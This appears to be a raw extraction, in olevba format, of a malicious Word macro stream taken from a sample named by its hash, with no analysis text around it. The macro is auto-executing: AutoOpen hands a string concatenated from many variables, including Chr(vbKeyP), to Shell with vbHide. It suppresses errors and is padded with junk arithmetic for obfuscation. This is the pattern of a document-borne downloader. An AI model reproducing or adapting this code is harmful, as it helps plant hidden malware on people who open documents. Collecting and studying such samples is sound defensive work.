Filename     : ./macros/597e1894e7119c40efb5bd9fdfa759df82b3b31455ca742f97c0a7e74ad90a81
OLE stream   : Macros/VBA/bpQVuMdM
VBA filename : bpQVuMdM.cls
----------------------------------------
Attribute VB_Name = "bpQVuMdM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jkRFwDRCE()
On Error Resume Next
sTiBfz = Fix(94964 / CSng(4060) * GWoqOC * vTSSrF)
VhBn = CDate(48905)
lvlHc = Fix(9177 / CSng(69661) * zaVAWs * Duiok)
VhBn = CDate(90467)
jkRFwDRCE = ASXcIW + XQQiiJWBizI + lUuws + CEwBjUiXk + EVkCGvaYb + nLaVXLNkj + wqjzIazSPPU + qhwTvwoYT + OiSwlsVTp + ijlznuK
adCho = Fix(77451 / CSng(45319) * wnuiP * OqZrVv)
VhBn = CDate(77263)
End Function
Sub Autoopen()
On Error Resume Next
tCbDw = Fix(28181 / CSng(45861) * RoJRV * EuPvC)
VhBn = CDate(98244)
qotwUp (jkRFwDRCE)
iGsckp = Fix(8376 / CSng(15727) * OzjJkz * lpIdp)
VhBn = CDate(42353)
End Sub
Function qotwUp(rwSfOwlfwP)
On Error Resume Next
VzOGl = Fix(60624 / CSng(53559) * spoLw * aOYTAU)
VhBn = CDate(50662)
tuILZF = icsHTWaDUE + Shell(GRDTbiQ + (Chr(vbKeyP)) + ikISjW + rwSfOwlfwP + pVmqYC, OubqE + vbHide + JniCr)
lLWEn = Fix(57971 / CSng(12732) * WmMAXi * jScUo)
VhBn = CDate(13095)
End Function

